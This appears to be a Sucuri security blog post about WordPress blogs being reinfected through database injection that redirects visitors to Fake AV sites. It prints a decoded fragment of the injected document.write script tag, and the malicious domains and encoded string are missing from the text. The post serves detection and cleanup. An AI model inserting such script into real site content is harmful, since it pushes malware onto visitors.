Database injection, Hilary Kneber and lessthenaminutehandle dot com

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to in all the posts in the database.

Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to (both hosted at

This hack also injects the malware on every post in the database, but this time encoded as:


Which decodes to:

document.write('<script src="

Unfortunately, the domain being used is not blacklisted by Google (or any AV), so the risk is high for every site visitor… If you want to verify your site to ensure it hasn’t been infected, you can scan it here: Sucuri SiteCheck

What happens when someone clicks an infected site?

They are redirected to one of following sites where the infamous Fake AV is pushed to the user…

Here is the whois for the group responsible for that domain (not Hilary Kneber this time, but since they are using the same IP addresses and intermediary hosts, we assume it is all the same):

Registrant Contact:
Jannet Degree
+154654645234 fax: +154654645234
Jose Road 78
SanHose NA 64567

We will post more details as we learn more about it.

If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Share This